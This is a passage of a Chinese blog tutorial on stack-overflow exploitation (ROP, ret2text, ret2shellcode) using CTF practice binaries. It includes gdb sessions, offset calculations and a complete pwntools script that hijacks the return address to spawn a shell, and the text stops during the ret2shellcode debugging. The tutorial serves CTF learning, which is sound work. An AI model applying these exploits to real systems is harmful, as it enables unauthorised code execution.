

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="alazymachine">
  <meta name="keywords" content="">
  
    <meta name="description" content="随着 NX 保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护，目前主要的是 ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序">
<meta property="og:type" content="article">
<meta property="og:title" content="栈溢出漏洞利用">
<meta property="og:url" content="https://alazymechnaic.github.io/2023/04/26/zhan-yi-chu-lou-dong-li-yong/index.html">
<meta property="og:site_name" content="alazymachine">
<meta property="og:description" content="随着 NX 保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护，目前主要的是 ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-04-26T03:17:43.000Z">
<meta property="article:modified_time" content="2024-03-05T12:21:38.543Z">
<meta property="article:author" content="alazymachine">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="stack overflow">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>栈溢出漏洞利用 - alazymachine</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"alazymechnaic.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="栈溢出漏洞利用"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-04-26 11:17" pubdate>
          2023年4月26日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          13k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          109 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">栈溢出漏洞利用</h1>
            
            
              <div class="markdown-body">
                
                <p>随着 NX 保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护，目前主要的是 ROP(Return Oriented Programming)，其主要思想是在<strong>栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。</strong>所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。</p>
<p>之所以称之为 ROP，是因为核心在于利用了指令集中的 ret 指令，改变了指令流的执行顺序。ROP 攻击一般得满足如下条件</p>
<ul>
<li>程序存在溢出，并且可以控制返回地址。</li>
<li>可以找到满足条件的 gadgets 以及相应 gadgets 的地址。</li>
</ul>
<p>如果 gadgets 每次的地址是不固定的，那我们就需要想办法动态获取对应的地址了。</p>
<h2 id="ret2text¶"><a href="#ret2text¶" class="headerlink" title="ret2text¶"></a>ret2text<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2text">¶</a></h2><h3 id="原理-¶"><a href="#原理-¶" class="headerlink" title="原理 ¶"></a>原理 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_1">¶</a></h3><p>ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实，这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。</p>
<p>这时，我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护，我们需要想办法去绕过这些保护。</p>
<h3 id="例子-¶"><a href="#例子-¶" class="headerlink" title="例子 ¶"></a>例子 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_2">¶</a></h3><p>其实，在栈溢出的基本原理中，我们已经介绍了这一简单的攻击。在这里，我们再给出另外一个例子，bamboofox 中介绍 ROP 时使用的 ret2text 的例子。</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text">ret2text</a></p>
<p>首先，查看一下程序的保护机制</p>
<figure class="highlight yaml"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">➜</span>  <span class="hljs-string">ret2text</span> <span class="hljs-string">checksec</span> <span class="hljs-string">ret2text</span><br>    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">i386-32-little</span><br>    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span><br>    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span><br>    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">enabled</span><br>    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x8048000)</span><br></code></pre></td></tr></tbody></table></figure>

<p>可以看出程序是 32 位程序，其仅仅开启了栈不可执行保护。然后，我们使用 IDA 来查看源代码。</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>{<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [sp+1Ch] [bp-64h]@1</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">setvbuf</span>(_bss_start, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"There is something amazing here, do you know anything?"</span>);<br>  <span class="hljs-built_in">gets</span>((<span class="hljs-type">char</span> *)&amp;v4);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Maybe I will tell you next time !"</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>可以看出程序在主函数中使用了 gets 函数，显然存在栈溢出漏洞。此后又发现</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs assembly">.text:080485FD secure          proc near<br>.text:080485FD<br>.text:080485FD input           = dword ptr -10h<br>.text:080485FD secretcode      = dword ptr -0Ch<br>.text:080485FD<br>.text:080485FD                 push    ebp<br>.text:080485FE                 mov     ebp, esp<br>.text:08048600                 sub     esp, 28h<br>.text:08048603                 mov     dword ptr [esp], 0 ; timer<br>.text:0804860A                 call    _time<br>.text:0804860F                 mov     [esp], eax      ; seed<br>.text:08048612                 call    _srand<br>.text:08048617                 call    _rand<br>.text:0804861C                 mov     [ebp+secretcode], eax<br>.text:0804861F                 lea     eax, [ebp+input]<br>.text:08048622                 mov     [esp+4], eax<br>.text:08048626                 mov     dword ptr [esp], offset unk_8048760<br>.text:0804862D                 call    ___isoc99_scanf<br>.text:08048632                 mov     eax, [ebp+input]<br>.text:08048635                 cmp     eax, [ebp+secretcode]<br>.text:08048638                 jnz     short locret_8048646<br>.text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"<br>.text:08048641                 call    _system<br></code></pre></td></tr></tbody></table></figure>

<p>在 secure 函数又发现了存在调用 system(“/bin/sh”) 的代码，那么如果我们直接控制程序返回至 0x0804863A，那么就可以得到系统的 shell 了。</p>
<p>下面就是我们如何构造 payload 了，首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs assembly">.text:080486A7                 lea     eax, [esp+1Ch]<br>.text:080486AB                 mov     [esp], eax      ; s<br>.text:080486AE                 call    _gets<br></code></pre></td></tr></tbody></table></figure>

<p>可以看到该字符串是通过相对于 esp 的索引，所以我们需要进行调试，将断点下在 call 处，查看 esp，ebp，如下</p>
<figure class="highlight x86asm"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">gef➤  b *<span class="hljs-number">0x080486AE</span><br>Breakpoint <span class="hljs-number">1</span> <span class="hljs-meta">at</span> <span class="hljs-number">0x80486ae</span>: file ret2text<span class="hljs-number">.</span>c, line <span class="hljs-number">24</span>.<br>gef➤  r<br>There is something amazing here, <span class="hljs-built_in">do</span> you know anything?<br><br>Breakpoint <span class="hljs-number">1</span>, <span class="hljs-number">0x080486ae</span> <span class="hljs-keyword">in</span> main () <span class="hljs-meta">at</span> ret2text<span class="hljs-number">.</span>c:<span class="hljs-number">24</span><br><span class="hljs-number">24</span>      gets(buf)<span class="hljs-comment">;</span><br>───────────────────────────────────────────────────────────────────────[ registers ]────<br>$<span class="hljs-built_in">eax</span>   : <span class="hljs-number">0xffffcd5c</span>  →  <span class="hljs-number">0x08048329</span>  →  <span class="hljs-string">"__libc_start_main"</span><br>$<span class="hljs-built_in">ebx</span>   : <span class="hljs-number">0x00000000</span><br>$<span class="hljs-built_in">ecx</span>   : <span class="hljs-number">0xffffffff</span><br>$<span class="hljs-built_in">edx</span>   : <span class="hljs-number">0xf7faf870</span>  →  <span class="hljs-number">0x00000000</span><br>$<span class="hljs-built_in">esp</span>   : <span class="hljs-number">0xffffcd40</span>  →  <span class="hljs-number">0xffffcd5c</span>  →  <span class="hljs-number">0x08048329</span>  →  <span class="hljs-string">"__libc_start_main"</span><br>$<span class="hljs-built_in">ebp</span>   : <span class="hljs-number">0xffffcdc8</span>  →  <span class="hljs-number">0x00000000</span><br>$<span class="hljs-built_in">esi</span>   : <span class="hljs-number">0xf7fae000</span>  →  <span class="hljs-number">0x001b1db0</span><br>$<span class="hljs-built_in">edi</span>   : <span class="hljs-number">0xf7fae000</span>  →  <span class="hljs-number">0x001b1db0</span><br>$<span class="hljs-built_in">eip</span>   : <span class="hljs-number">0x080486ae</span>  →  &lt;main+<span class="hljs-number">102</span>&gt; <span class="hljs-keyword">call</span> <span class="hljs-number">0x8048460</span> &lt;gets@plt&gt;<br></code></pre></td></tr></tbody></table></figure>

<p>可以看到 esp 为 0xffffcd40，ebp 为 0xffffcdc8，同时 s 相对于 esp 的索引为 <code>esp+0x1c</code>，因此，我们可以推断</p>
<ul>
<li>s 的地址为 0xffffcd5c</li>
<li>s 相对于 ebp 的偏移为 0x6c</li>
<li>s 相对于返回地址的偏移为 0x6c+4</li>
</ul>
<p>最后的 payload 如下：</p>
<figure class="highlight clean"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs clean">##!/usr/bin/env python<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>sh = process(<span class="hljs-string">'./ret2text'</span>)<br>target = <span class="hljs-number">0x804863a</span><br>sh.sendline(<span class="hljs-string">'A'</span> * (<span class="hljs-number">0x6c</span>+<span class="hljs-number">4</span>) + p32(target))<br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<h2 id="ret2shellcode¶"><a href="#ret2shellcode¶" class="headerlink" title="ret2shellcode¶"></a>ret2shellcode<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2shellcode">¶</a></h2><h3 id="原理-¶-1"><a href="#原理-¶-1" class="headerlink" title="原理 ¶"></a>原理 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_3">¶</a></h3><p>ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。<strong>一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码</strong>。</p>
<p>在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限。</p>
<h3 id="例子-¶-1"><a href="#例子-¶-1" class="headerlink" title="例子 ¶"></a>例子 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#_4">¶</a></h3><p>这里我们以 bamboofox 中的 ret2shellcode 为例</p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2shellcode/ret2shellcode-example/ret2shellcode">ret2shellcode</a></p>
<p>首先检测程序开启的保护</p>
<figure class="highlight yaml"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">➜</span>  <span class="hljs-string">ret2shellcode</span> <span class="hljs-string">checksec</span> <span class="hljs-string">ret2shellcode</span><br>    <span class="hljs-attr">Arch:</span>     <span class="hljs-string">i386-32-little</span><br>    <span class="hljs-attr">RELRO:</span>    <span class="hljs-string">Partial</span> <span class="hljs-string">RELRO</span><br>    <span class="hljs-attr">Stack:</span>    <span class="hljs-literal">No</span> <span class="hljs-string">canary</span> <span class="hljs-string">found</span><br>    <span class="hljs-attr">NX:</span>       <span class="hljs-string">NX</span> <span class="hljs-string">disabled</span><br>    <span class="hljs-attr">PIE:</span>      <span class="hljs-literal">No</span> <span class="hljs-string">PIE</span> <span class="hljs-string">(0x8048000)</span><br>    <span class="hljs-attr">RWX:</span>      <span class="hljs-string">Has</span> <span class="hljs-string">RWX</span> <span class="hljs-string">segments</span><br></code></pre></td></tr></tbody></table></figure>

<p>可以看出源程序几乎没有开启任何保护，并且有可读，可写，可执行段。我们再使用 IDA 看一下程序</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function"><span class="hljs-type">int</span> __cdecl <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span></span><br><span class="hljs-function"></span>{<br>  <span class="hljs-type">int</span> v4; <span class="hljs-comment">// [sp+1Ch] [bp-64h]@1</span><br><br>  <span class="hljs-built_in">setvbuf</span>(stdout, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">setvbuf</span>(stdin, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No system for you this time !!!"</span>);<br>  <span class="hljs-built_in">gets</span>((<span class="hljs-type">char</span> *)&amp;v4);<br>  <span class="hljs-built_in">strncpy</span>(buf2, (<span class="hljs-type">const</span> <span class="hljs-type">char</span> *)&amp;v4, <span class="hljs-number">0x64</span>u);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">"bye bye ~"</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>可以看出，程序仍然是基本的栈溢出漏洞，不过这次还同时将对应的字符串复制到 buf2 处。简单查看可知 buf2 在 bss 段。</p>
<figure class="highlight arduino"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs arduino">.bss:<span class="hljs-number">0804</span>A080                 <span class="hljs-keyword">public</span> buf2<br>.bss:<span class="hljs-number">0804</span>A080 ; <span class="hljs-type">char</span> buf2[<span class="hljs-number">100</span>]<br></code></pre></td></tr></tbody></table></figure>

<p>这时，我们简单的调试下程序，看看这一个 bss 段是否可执行。</p>
<figure class="highlight gradle"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs gradle">gef➤  b main<br>Breakpoint <span class="hljs-number">1</span> at <span class="hljs-number">0</span>x8048536: <span class="hljs-keyword">file</span> ret2shellcode.c, line <span class="hljs-number">8</span>.<br>gef➤  r<br>Starting program: <span class="hljs-regexp">/mnt/</span>hgfs<span class="hljs-regexp">/Hack/</span>CTF-Learn<span class="hljs-regexp">/pwn/</span>stack<span class="hljs-regexp">/example/</span>ret2shellcode/ret2shellcode <br><br>Breakpoint <span class="hljs-number">1</span>, main () at ret2shellcode.c:<span class="hljs-number">8</span><br><span class="hljs-number">8</span>       setvbuf(stdout, <span class="hljs-number">0</span>LL, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>LL);<br>─────────────────────────────────────────────────────────────────────[ <span class="hljs-keyword">source</span>:ret2shellcode.c+<span class="hljs-number">8</span> ]────<br>      <span class="hljs-number">6</span>  <span class="hljs-keyword">int</span> main(<span class="hljs-keyword">void</span>)<br>      <span class="hljs-number">7</span>  {<br> →    <span class="hljs-number">8</span>      setvbuf(stdout, <span class="hljs-number">0</span>LL, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>LL);<br>      <span class="hljs-number">9</span>      setvbuf(stdin, <span class="hljs-number">0</span>LL, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>LL);<br>     <span class="hljs-number">10</span>  <br>─────────────────────────────────────────────────────────────────────[ trace ]────<br>[#<span class="hljs-number">0</span>] <span class="hljs-number">0</span>x8048536 → Name: main()<br>─────────────────────────────────────────────────────────────────────────────────────────────────────<br>gef➤  vmmap <br>Start      End        Offset     Perm Path<br><span class="hljs-number">0</span>x08048000 <span class="hljs-number">0</span>x08049000 <span class="hljs-number">0</span>x00000000 r-x <span class="hljs-regexp">/mnt/</span>hgfs<span class="hljs-regexp">/Hack/</span>CTF-Learn<span class="hljs-regexp">/pwn/</span>stack<span class="hljs-regexp">/example/</span>ret2shellcode/ret2shellcode<br><span class="hljs-number">0</span>x08049000 <span class="hljs-number">0</span>x0804a000 <span class="hljs-number">0</span>x00000000 r-x <span class="hljs-regexp">/mnt/</span>hgfs<span class="hljs-regexp">/Hack/</span>CTF-Learn<span class="hljs-regexp">/pwn/</span>stack<span class="hljs-regexp">/example/</span>ret2shellcode/ret2shellcode<br><span class="hljs-number">0</span>x0804a000 <span class="hljs-number">0</span>x0804b000 <span class="hljs-number">0</span>x00001000 rwx <span class="hljs-regexp">/mnt/</span>hgfs<span class="hljs-regexp">/Hack/</span>CTF-Learn<span class="hljs-regexp">/pwn/</span>stack<span class="hljs-regexp">/example/</span>ret2shellcode/ret2shellcode<br><span class="hljs-number">0</span>xf7dfc000 <span class="hljs-number">0</span>xf7fab000 <span class="hljs-number">0</span>x00000000 r-x <span class="hljs-regexp">/lib/i</span>386-linux-gnu/libc-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7fab000 <span class="hljs-number">0</span>xf7fac000 <span class="hljs-number">0</span>x001af000 --- <span class="hljs-regexp">/lib/i</span>386-linux-gnu/libc-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7fac000 <span class="hljs-number">0</span>xf7fae000 <span class="hljs-number">0</span>x001af000 r-x <span class="hljs-regexp">/lib/i</span>386-linux-gnu/libc-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7fae000 <span class="hljs-number">0</span>xf7faf000 <span class="hljs-number">0</span>x001b1000 rwx <span class="hljs-regexp">/lib/i</span>386-linux-gnu/libc-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7faf000 <span class="hljs-number">0</span>xf7fb2000 <span class="hljs-number">0</span>x00000000 rwx <br><span class="hljs-number">0</span>xf7fd3000 <span class="hljs-number">0</span>xf7fd5000 <span class="hljs-number">0</span>x00000000 rwx <br><span class="hljs-number">0</span>xf7fd5000 <span class="hljs-number">0</span>xf7fd7000 <span class="hljs-number">0</span>x00000000 r-- [vvar]<br><span class="hljs-number">0</span>xf7fd7000 <span class="hljs-number">0</span>xf7fd9000 <span class="hljs-number">0</span>x00000000 r-x [vdso]<br><span class="hljs-number">0</span>xf7fd9000 <span class="hljs-number">0</span>xf7ffb000 <span class="hljs-number">0</span>x00000000 r-x <span class="hljs-regexp">/lib/i</span>386-linux-gnu/ld-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7ffb000 <span class="hljs-number">0</span>xf7ffc000 <span class="hljs-number">0</span>x00000000 rwx <br><span class="hljs-number">0</span>xf7ffc000 <span class="hljs-number">0</span>xf7ffd000 <span class="hljs-number">0</span>x00022000 r-x <span class="hljs-regexp">/lib/i</span>386-linux-gnu/ld-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xf7ffd000 <span class="hljs-number">0</span>xf7ffe000 <span class="hljs-number">0</span>x00023000 rwx <span class="hljs-regexp">/lib/i</span>386-linux-gnu/ld-<span class="hljs-number">2.23</span>.so<br><span class="hljs-number">0</span>xfffdd000 <span class="hljs-number">0</span>xffffe000 <span class="hljs-number">0</span>x00000000 